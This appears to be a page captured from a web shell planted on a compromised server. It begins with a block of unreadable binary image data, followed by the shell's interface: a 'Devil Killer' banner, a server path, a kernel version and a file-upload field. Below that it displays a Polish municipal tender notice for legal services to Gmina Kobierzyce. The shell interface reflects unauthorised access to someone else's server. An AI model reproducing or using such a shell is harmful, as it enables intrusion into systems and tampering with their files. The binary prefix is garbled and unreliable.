JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230426/0019358501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług prawniczych obejmujących stałą i kompleksową obsługę prawną Gminy Kobierzyce , Urzędu Gminy Kobierzyce oraz gminnych jednostek oświatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kobierzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935075</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Pałacowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobierzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">apucek@ugk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ugk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług prawniczych obejmujących stałą i kompleksową obsługę prawną Gminy Kobierzyce , Urzędu Gminy Kobierzyce oraz gminnych jednostek oświatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a5202f2-e41a-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00193585</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00090576/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.24 Świadczenie usług prawniczych obejmujących stałą i kompleksową obsługę prawną Gminy Kobierzyce, UGK oraz gminnych jednostek oświatowych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugk.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugk.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Logintrade. <br/>2.	Środkiem komunikacji elektronicznej, służącym komunikacji między Zamawiającym <br/>a Wykonawcami jest Platforma dostępna pod adresem https://ugk.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. Korzystanie z Platformy przez Wykonawcę jest bezpłatne. <br/>3.	Instrukcja obsługi platformy w niniejszym postępowaniu dostępna jest na stronie https://ugk.logintrade.net/rejestracja/ w zakładce INSTRUKCJE pliki: Rejestracja Wykonawcy na Platformie, Zadawanie pytań do postępowania oraz Udział w przetargu nieograniczonym.<br/>4.	Wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie: <br/>	Dopuszczalne przeglądarki internetowe: <br/>a)	Google Chrome 90<br/>b)	Mozilla Firefox 95<br/>c)	Opera 78<br/>d)	microsoft edge 92<br/>	Pozostałe wymagania techniczne: <br/>a)	dostęp do sieci internet; <br/>b)	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax; <br/>c)	włączona obsługa JavaScript; <br/>d)	zalecana szybkość łącza internetowego powyżej 500 KB/s; <br/>e)	zainstalowany Acrobat Reader; <br/>f)	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment <br/>6 Update 24 lub nowszy. <br/>6.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środkach dowodowych, przedmiotowych środkach dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przesłania na Platformę.<br/>7.	Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej <br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: .pdf.<br/>8.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: apucek@ugk.pl<br/>9.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów <br/>lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy przetargowej. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń, z wyłączeniem ofert, za pomocą poczty elektronicznej, na adres e-mail: apucek@ugk.pl, przy czym za datę ich przekazania przyjmuje się datę ich otrzymania przez Zamawiającego. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 31.12.2020r. (DZ.U. 2020 r., poz. 2452).<br/>10.	Zamawiający nie dopuszcza sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ.<br/>11.	W razie wystąpienia jakichkolwiek problemów dot. platformy przetargowej prosimy <br/>o kontakt z działem Helpdesk Logintrade: 71787 37 27, e-mail: helpdesk@logintrade.net</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły zawiera Załącznik nr 1 do umowy – Klauzula informacyjna</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły zawiera Załącznik nr 1 do umowy – Klauzula informacyjna</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RŚZiZP.271.14.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług prawniczych obejmujących stałą i kompleksową obsługę prawną Gminy Kobierzyce (organów: Gminy i Rady), Urzędu Gminy Kobierzyce oraz gminnych jednostek oświatowych, obejmującą zakresem wszystkie dziedziny prawa związane z realizacją całości zadań własnych, kompetencji <br/>i obowiązków Zamawiającego, w tym w szczególności obejmujące następujące dziedziny:<br/>a)	Prawo samorządowe;<br/>b)	Prawo administracyjne, w tym procedury administracyjne;<br/>c)	Prawo cywilne;<br/>d)	Prawo zamówień publicznych ;<br/>e)	Gospodarka nieruchomościami;<br/>f)	Drogi publiczne;<br/>g)	Planowanie i zagospodarowanie przestrzenne, w tym zakres związany z ochrona gruntów rolnych;<br/>h)	Inwestycje budowlane w tym realizowane na podstawie warunków FIDIC;<br/>i)	Zbiorowe zaopatrzenie w wodę i zbiorowe odprowadzanie ścieków;<br/>j)	Gospodarowanie zasobem komunalnym (lokale);<br/>k)	Oświata, w tym sprawy z zakresu Karty Nauczyciela <br/>l)	Ochrona zdrowia, w tym programy zdrowotne opracowywane i realizowane przez jednostkę samorządu terytorialnego;<br/>m)	Podatki, w tym interpretacje indywidualne;<br/>n)	Finanse publiczne, w tym sprawy związane z dotacjami stowarzyszeń, użytek publiczny, sport, prawo wodne;<br/>o)	Ochrona środowiska, utrzymanie porządku w gminie, odpady komunalne;<br/>p)	Fundusze unijne i krajowe;<br/>q)	Pomoc publiczna, w tym w formie gminnych programów pomocowych oraz pomoc <br/>de minimis;<br/>r)	Konsultacje oraz weryfikacje prawne zgodności z prawem całokształtu działalności <br/>co najmniej 8 jednostek oświatowych.<br/>s)	podatkowymi i organami administracji publicznej oraz organami egzekucyjnymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">7.	Zamawiający przewiduje możliwość udzielania zamówień, o których mowa w art. 241 ust.1 pkt 7 ustawy PZP w wysokości nie więcej niż 50% wartości szacunkowej zamówienia podstawowego. Zakres prac objętych ewentualnym zamówieniem podobnym może dotyczyć usługi obsługi prawnej wynikających z zakresu działalności jednostek samorządu terytorialnego bądź powstania nowych jednostek organizacyjnych Zamawiającego lub innych elementów związanych z przedmiotowym zamówieniem. Zamówienia te winny być opisane w protokole konieczności i zostaną udzielone na warunkach analogicznych do tych wynikających ze wzoru umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia.<br/><br/>Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta w toku oceny ofert nie zostanie odrzucona i będzie ofertą najkorzystniejszą na podstawie kryteriów: ceny, doświadczenia i kadry tj. uzyska największą łączną cenę punktową stanowiącą sumę C + D + K</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość lat doświadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kadra dodatkowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie wymaga spełnienia tego warunku.<br/><br/>Ze względu na charakter świadczonych usług Zamawiający uznaje cały zakres powierzonej obsługi prawnej za kluczowy i w związku z tym:<br/>- nie dopuszcza się podwykonawstwa,<br/>- nie dopuszcza się realizowania zamówienia w formie konsorcjum,<br/>- nie dopuszcza się wykazywania przez Wykonawcę spełnienia warunków ubiegania się o udzielenie zamówienia poprzez posługiwania się zasobami udostępnionymi przez inne podmioty,<br/>- za personel własny Wykonawcy uznaje się wyłącznie osoby zatrudnione przez Wykonawcę co najmniej na 3 miesiące przed datą ukazania się ogłoszenia o zamówieniu. Przez osoby zatrudnione rozumie się osoby, którymi Wykonawca dysponuje bezpośrednio i na zasadzie wyłączności. <br/><br/>b) zdolności technicznej lub zawodowej tj.:<br/>Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanych <br/>(a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług <br/>w zakresie kompleksowej i stałej obsługi prawnej jednostki samorządu oraz reprezentacji prawnej jednostki samorządu terytorialnego, w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy – w tym okresie. W tym celu Wykonawca musi wykazać, iż:<br/>1)	przez co najmniej 2 lata nieprzerwanie świadczył na rzecz jednostki samorządu terytorialnego usługę: kompleksowej i stałej pomocy prawnej, w ramach której Wykonawca odbywał dyżur w siedzibie Zamawiającego w wymiarze nie mniejszym niż: 25 godzin tygodniowo, obejmującą zakresem wszystkie poniższe dziedziny prawa:<br/>a)	Prawo samorządowe;<br/>b)	Prawo administracyjne, w tym procedury administracyjne;<br/>c)	Prawo cywilne;<br/>d)	Prawo zamówień publicznych ;<br/>e)	Gospodarka nieruchomościami;<br/>f)	Drogi publiczne;<br/>g)	Planowanie i zagospodarowanie przestrzenne, w tym zakres związany <br/>z ochrona gruntów rolnych;<br/>h)	Inwestycje budowlane, w tym zrealizowane na podstawie warunków FIDIC;<br/>i)	Zbiorowe zaopatrzenie w wodę i zbiorowe odprowadzanie ścieków;<br/>j)	Gospodarowanie zasobem komunalnym (lokale);<br/>k)	Oświata, w tym sprawy z zakresu Karty Nauczyciela <br/>l)	Ochrona zdrowia, w tym programy zdrowotne opracowywane i realizowane przez jednostkę samorządu terytorialnego;<br/>m)	Podatki, w tym interpretacje indywidualne ;<br/>n)	Finanse publiczne, w tym sprawy związane z dotacjami stowarzyszeń, użytek publiczny, sport, prawo wodne;<br/>o)	Ochrona środowiska, utrzymanie porządku w gminie, odpady komunalne;<br/>p)	Fundusze unijne i krajowe;<br/>q)	Pomoc publiczna, w tym w formie gminnych programów pomocowych oraz pomoc de minimis;<br/>r)	Konsultacje oraz weryfikacja prawna zgodności z prawem całokształtu działalności co najmniej 3 jednostek oświatowych<br/>s)	podatkowymi i organami administracji publicznej oraz organami egzekucyjnymi.<br/>2)	Wykonał na rzecz jednostki samorządu terytorialnego co najmniej jedna usługę w każdym z poniższych zakresów:<br/>a)	Obsługa prawna co najmniej 10 sesji Rady Gminy (powiatu/województwa),<br/>b)	Obsługa prawna postępowania o udzielenie zamówienia publicznego <br/>w zakresie odbierania i zagospodarowania odpadów komunalnych;<br/>c)	Obsługa prawna postępowania o udzielenie zamówienia publicznego <br/>w zakresie publicznego transportu zbiorowego, <br/>d)	Złożenie i rejestracja spółki komunalnej lub wykonywanie przez jednostkę samorządu terytorialnego uprawnień właścicielskich wobec takiej spółki, przez co najmniej 6 miesięcy;<br/>e)	Obsługa prawna obejmująca przygotowanie co najmniej 10 porozumień jednostki samorządu terytorialnego z inwestorami prywatnymi realizującymi swoje inwestycje na terenie gminy/powiatu/województwa, w tym co najmniej jedno porozumienie dotyczące inwestycji prywatnej o szacowanej wartości <br/>co najmniej 50 mln złotych; <br/>f)	Konsultacje oraz weryfikacja prawna zgodności z prawem co najmniej jednego procesu rekrutacji do szkoły / przedszkola.<br/>z podaniem ich rodzaju i wartości, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów potwierdzających, że usługi (pkt 1), 2), powyżej) zostały wykonane lub są wykonywane należycie. <br/><br/>c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi <br/>do wykonania zamówienia;<br/>Za spełnienie powyższego warunku Zamawiający uzna dysponowanie co najmniej <br/>3 osobami uprawnionymi do świadczenia pomocy prawnej, posiadającymi aktualny wpis na listę radców prawnych/adwokatów i spełniającymi poniżej wskazane kryteria:<br/>Osoby zdolne do wykonania zamówienia muszą posiadać min. doświadczenie:<br/>1)	osoba świadcząca obsługę prawną: koordynator – radca prawny/adwokat posiadający co najmniej 5 letnie doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych/adwokatów), a także co najmniej 3 letnie doświadczenie w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego <br/>(w tym w formie dyżurów w siedzibie Zamawiającego w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie minimalnego doświadczenia) obejmującej wszystkie spośród dziedzin wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 1) oraz posiadający doświadczenie wynikające <br/>z realizacji na rzecz jednostki samorządu terytorialnego co najmniej trzech spośród usług wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 2),<br/>2)	osoba świadcząca obsługę prawna: radca prawny/adwokat posiadający co najmniej 3 letnie doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych/ adwokatów), a także co najmniej 2 letnie doświadczenie <br/>w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego <br/>(w tym w formie dyżurów w siedzibie Zamawiającego w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie) obejmującej <br/>co najmniej 9 spośród dziedzin wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 1) oraz doświadczenie wynikające z realizacji na rzecz jednostki samorządu terytorialnego co najmniej dwóch spośród usług wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 2),<br/>3)	osoba świadcząca obsługę prawną: radca prawny/adwokat posiadający co najmniej 6 miesięczne doświadczenie zawodowe (liczone od daty wpisu na listę radców prawnych/adwokatów), w kompleksowej i stałej obsłudze prawnej jednostki samorządu terytorialnego (w tym w formie dyżurów w siedzibie Zamawiającego <br/>w wymiarze nie mniejszym niż średnio jeden dzień w tygodniu w zakreślonym okresie) obejmującej co najmniej 9 spośród dziedzin wskazanych <br/>w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 1) oraz doświadczenie wynikające <br/>z realizacji na rzecz jednostki samorządu terytorialnego co najmniej jednej spośród usług wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 2),<br/>przy czym:<br/>a)	osoba z pkt 1), 2) i 3) winny łącznie posiadać doświadczenie obejmujące wszystkie usługi opisane w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 2);<br/>b)	osoby z pkt 2) i 3) winny łącznie posiadać doświadczenie obejmujące wszystkie dziedziny opisane w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 1);<br/>c)	doświadczenie dotyczące usług wskazanych w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 2) może wynikać z realizacji jednej umowy na rzecz jednostki samorządu terytorialnego (w tym także w ramach stałej i kompleksowej obsługi prawnej opisanej w Rozdziale XVII pkt 1 ppkt 1.2 lit. b) ppkt 1)) lub <br/>z realizacji kilku usług na rzecz różnych jednostek samorządu terytorialnego.<br/><br/>d) sytuacji ekonomicznej i finansowej<br/>Zamawiający nie wymaga wykazania spełniania tego warunku.<br/><br/>e) Zakaz działalności konkurencyjnej<br/>O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, którzy w okresie 2 lat przed ogłoszeniem o zamiarze udzielenia zamówienia nie reprezentowali podmiotów w sporach sądowych lub administracyjnych w których uczestniczył również Zamawiający. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> 